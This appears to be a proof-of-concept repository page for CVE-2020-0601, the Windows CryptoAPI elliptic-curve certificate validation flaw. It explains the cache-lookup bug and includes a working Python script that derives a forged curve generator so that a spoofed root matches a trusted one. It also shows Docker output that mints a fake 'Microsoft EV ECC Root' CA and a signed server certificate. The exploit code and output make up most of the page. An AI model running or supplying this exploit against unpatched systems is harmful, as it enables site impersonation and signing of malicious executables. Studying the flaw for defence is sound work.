
POC details: 46912bfaa96b10715c59eac8e97b911d46dcf13a

Related vulnerability
Title: Microsoft Windows CryptoAPI trust management vulnerability (CVE-2020-0601)
Description: Microsoft Windows CryptoAPI is a cryptographic facility that Microsoft added to the Windows operating system. As the foundation for data encryption and decryption, CryptoAPI supports synchronous and asynchronous key-based cryptographic processing and manages the digital certificates in the operating system. The method that validates elliptic curve cryptography (ECC) certificates in Microsoft Windows CryptoAPI (Crypt32.dll) has a trust management vulnerability. An attacker can exploit it by using a spoofed code-signing certificate to sign a malicious executable. The following products and versions are affected: Micr
Description
proof of concept for CVE-2020-0601
Introduction
# CVE-2020-0601 proof of concept

A fun proof of concept that creates your own root CA and a certificate signed
by it, based on the CVE-2020-0601 vulnerability in Windows 10. The underlying
issue is that `CertGetCertificateChain()` improperly validated root
certificate authorities. Because searching the trust store for a matching root
certificate is expensive, Microsoft added a cache that used the public key of
the supplied root certificate to decide whether that certificate had already
been loaded from the trust store. For elliptic curve certificates, however,
the SubjectPublicKeyInfo carries more than a public key: it must also name the
curve (by OID) or carry explicit custom curve parameters. The vulnerability
arises because those curve parameters are not part of the cache lookup. Given
a trusted root's public key Q, we choose our own private key d' and compute a
new generator G' = d'^-1 * Q, so that d' * G' = Q on the same curve. A root
certificate that carries Q together with explicit parameters naming G' as the
generator then matches the genuinely trusted root in Microsoft's previously
vulnerable cache lookup, while its signatures verify under our parameters. The
trick only works against a verifier that honours explicit curve parameters; a
verifier that accepts named curves alone is not fooled.
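The generator substitution described above, as an added example that is not the project's `mkroot.py` or any other code from the original page: pure-Python affine arithmetic on P-384 (the curve is an assumption, consistent with the 97-byte uncompressed generator printed in the Usage section below) that takes a root's public point Q, picks an attacker private key d', derives G' = d'^-1 * Q, and shows that the forged key bytes are identical to Q while an ECDSA signature made with d' verifies only under the forged parameters. The victim key, attacker key, nonce and message are constructed for the demo.

```python
"""Added example: the CVE-2020-0601 key trick on P-384 (no external dependencies)."""
import hashlib

# NIST P-384 domain parameters (FIPS 186-4); the spoofed root is assumed to use this curve.
P = 2**384 - 2**128 - 2**96 + 2**32 - 1
A = P - 3
B = 0xb3312fa7e23ee7e4988e056be3f82d19181d9c6efe8141120314088f5013875ac656398d8a2ed19d2a85c8edd3ec2aef
N = 0xffffffffffffffffffffffffffffffffffffffffffffffffc7634d81f4372ddf581a0db248b0a77aecec196accc52973
G = (0xaa87ca22be8b05378eb1c71ef320ad746e1d3b628ba79b9859f741e082542a385502f25dbf55296c3a545e3872760ab7,
     0x3617de4a96262c6f5d9e98bf9292dc29f8f41dbd289a147ce9da3113b5f0b8c00a60b1ce1d7e819d7a431d7c90ea0e5f)


def on_curve(pt):
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def ec_add(p1, p2):
    """Affine point addition; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, pt):
    """Double-and-add scalar multiplication (not constant time; demo only)."""
    result, addend = None, pt
    while k:
        if k & 1:
            result = ec_add(result, addend)
        addend = ec_add(addend, addend)
        k >>= 1
    return result


def encode_point(pt):
    """Uncompressed SEC1 encoding: the bytes the SPKI carries and the cache was keyed on."""
    return b"\x04" + pt[0].to_bytes(48, "big") + pt[1].to_bytes(48, "big")


def forge_generator(q, new_priv):
    """Attacker step: choose d' and compute G' = d'^-1 * Q, so that d' * G' = Q."""
    return ec_mul(pow(new_priv, -1, N), q)


def hash_msg(msg):
    return int.from_bytes(hashlib.sha384(msg).digest(), "big") % N


def ecdsa_sign(priv, gen, msg, k):
    """Textbook ECDSA with a caller-supplied nonce (real code uses RFC 6979 or a CSPRNG)."""
    e = hash_msg(msg)
    r = ec_mul(k, gen)[0] % N
    s = pow(k, -1, N) * (e + r * priv) % N
    return (r, s)


def ecdsa_verify(pub, gen, msg, sig):
    """ECDSA verification under whatever generator the caller (or the certificate) supplies."""
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    w = pow(s, -1, N)
    pt = ec_add(ec_mul(hash_msg(msg) * w % N, gen), ec_mul(r * w % N, pub))
    return pt is not None and pt[0] % N == r


def demo(victim_priv, attacker_priv, nonce, msg=b"constructed to-be-signed bytes for hogwarts.lf.lc"):
    """victim_priv is only used to build a realistic Q; the attacker never learns it."""
    q = ec_mul(victim_priv, G)                 # the trusted root's public key
    g2 = forge_generator(q, attacker_priv)     # the 'Modified generator'
    forged_pub = ec_mul(attacker_priv, g2)     # what the forged root's SPKI carries
    sig = ecdsa_sign(attacker_priv, g2, msg, nonce)
    return {
        "modified_generator": encode_point(g2).hex(),
        "same_key_bytes": encode_point(forged_pub) == encode_point(q),
        "verifies_with_forged_params": ecdsa_verify(q, g2, msg, sig),
        "verifies_with_real_params": ecdsa_verify(q, G, msg, sig),
    }


if __name__ == "__main__":
    out = demo(victim_priv=hash_msg(b"victim root key (constructed)"),
               attacker_priv=hash_msg(b"attacker key (constructed)"),
               nonce=hash_msg(b"demo nonce (constructed)"))
    for key, value in out.items():
        print(f"{key}: {value}")
```

`same_key_bytes` is exactly the comparison the vulnerable cache performed: the forged root's public-key bytes equal the real root's, so the lookup succeeds, and the chain then verifies under the attacker's generator (`verifies_with_forged_params`). The same signature fails under the genuine parameters (`verifies_with_real_params`), which is why checking the full parameters, not just the key bytes, closes the hole.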

This repository demonstrates spoofing the "Microsoft EV ECC Root Certificate
Authority 2017" trusted root certificate and using this new root CA to sign a
leaf certificate.

![Proof of concept certificate shown in Internet Explorer.](assets/proof-of-concept.png)

## Build

```
docker build -t gringotts .
```

## Usage

```
$ docker run --rm -it -v "$(pwd):/host" -w /host gringotts
Modified generator:
04bb3de13398a18e1c0d1a2d77ae8cbb9ea358d8c5c075eac51e0c408a0367db2ba187f1ab2febd8859d4c12811563fae6056fef803bff43964ca15c63a28cdc1fdfd38dab9fac20e7a8fa1fae619e576ee5706423414a3c3f8c7e1a2d8adc9cd7
Serializing root.txt and self-sign root certificate
Writing ca/root.pem
Serializing root private key
Writing ca/root-key.pem
read EC key
writing EC key
Generating a RSA private key
...............................................+++++
.........................................................................................+++++
writing new private key to 'ssl/server-key.pem'
-----
Using configuration from /usr/lib/ssl/openssl.cnf
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number:
            7c:e6:11:18:1c:5a:14:3e:6f:f0:e2:85:ea:5f:c7:dc:50:a4:b9:b2
        Validity
            Not Before: Apr 30 00:00:00 2018 GMT
            Not After : Aug  1 00:00:00 2020 GMT
        Subject:
            countryName               = GB
            stateOrProvinceName       = Scotland
            localityName              = Highlands
            organizationName          = Gringotts
            organizationalUnitName    = Hogwarts Castle
            commonName                = hogwarts.lf.lc
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:hogwarts.lf.lc
Certificate is to be certified until Aug  1 00:00:00 2020 GMT (184 days)

Write out database with 1 new entries
Data Base Updated
$ tree
.
├── ca
│   ├── root-key.pem
│   └── root.pem
└── ssl
    ├── server-bundle.pem
    ├── server-key.pem
    └── server.pem
```

File snapshot

```
[4.0K] /data/pocs/46912bfaa96b10715c59eac8e97b911d46dcf13a
├── [4.0K] assets
│   └── [ 92K] proof-of-concept.png
├── [ 542] Dockerfile
├── [3.1K] README.md
├── [ 30] requirements.txt
├── [4.0K] scripts
│   ├── [ 621] csr.sh
│   ├── [ 81] mint.sh
│   └── [1.9K] mkroot.py
└── [4.0K] templates
    ├── [ 896] root-key.txt
    ├── [3.5K] root.txt
    └── [ 259] server.cnf

3 directories, 10 files
```